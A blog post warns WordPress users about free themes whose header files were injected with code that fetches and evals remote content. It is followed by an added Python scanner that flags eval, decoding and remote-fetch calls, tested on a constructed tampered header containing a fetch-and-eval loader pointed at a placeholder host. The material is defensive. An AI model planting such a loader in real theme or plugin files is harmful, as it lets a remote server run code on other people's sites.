More WordPress Hack Problems
Now, this kind of issue is a scary one. You could have your install locked up like Alcatraz and you still aren't completely safe from exploits. Although this has probably been discussed here before, I think it is worth bringing up again.
If you are downloading themes and plugins, you have to be careful who you are getting them from. A site called WPSphere (I am not going to link to it; you can Google it to check it out) is releasing free themes with a nasty little twist. They are injecting malicious code into the header files.
I think the potential for abuse of this script is huge. I see it as a covert channel to set up WordPress-enabled sites as thin zombies. The code being sent back to the server and eval'd could be a mailing script for spam or phishing.
The lesson in all of this is that you need to know what the normal default coding looks like for WordPress if you want to stand a chance of not having this happen to you. You don't need to be a programmer to go through the files to see if you have anything suspicious in the coding. The malicious code might not always stick out like a sore thumb the way this does, but get an idea of how WordPress works to keep yourself safe. You might want to check your sites if you downloaded any themes that weren't from the developer's site.
I included a screenshot of what this code looks like.
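The file check described in the post can be partly automated. The following is an added example, not code from the original post or from WordPress: a heuristic scanner that flags theme PHP files combining code execution with remote fetching or decoding. The indicator list, function names and sample files are assumptions made for illustration.

```python
import re
from pathlib import Path

# Heuristic indicators; an illustrative list assumed for this example, not exhaustive.
INDICATORS = {
    "eval": re.compile(r"\b(eval|create_function)\s*\(", re.I),
    "decode": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "fetch": re.compile(r"\b(file_get_contents|curl_exec|fsockopen|wp_remote_get)\s*\(", re.I),
}

def scan_php(source):
    """Return [(line_number, [indicator names])] for every line that matches."""
    findings = []
    for number, line in enumerate(source.splitlines(), 1):
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(line))
        if hits:
            findings.append((number, hits))
    return findings

def verdict(source):
    """'high' when code execution is combined with fetching or decoding, else 'review'/'clean'."""
    seen = {name for _, hits in scan_php(source) for name in hits}
    if "eval" in seen and seen & {"decode", "fetch"}:
        return "high"
    return "review" if seen else "clean"

def scan_theme(theme_dir):
    """Map each non-clean .php file under theme_dir to its verdict."""
    results = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        v = verdict(path.read_text(errors="replace"))
        if v != "clean":
            results[str(path.relative_to(theme_dir))] = v
    return results

# Constructed samples: a plain header.php and the same file with an added loader.
CLEAN_HEADER = """<html xmlns="http://www.w3.org/1999/xhtml">
<head><title><?php wp_title(); ?></title>
<?php wp_head(); ?>
</head>"""
TAMPERED_HEADER = CLEAN_HEADER + """
<?php $r = file_get_contents('http://example.invalid/');
eval($r); ?>"""

if __name__ == "__main__":
    import sys
    for name, v in scan_theme(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{v:6} {name}")
```

A "review" result only means a file deserves a manual look; comparing the theme against a copy from the developer's own site remains the stronger check.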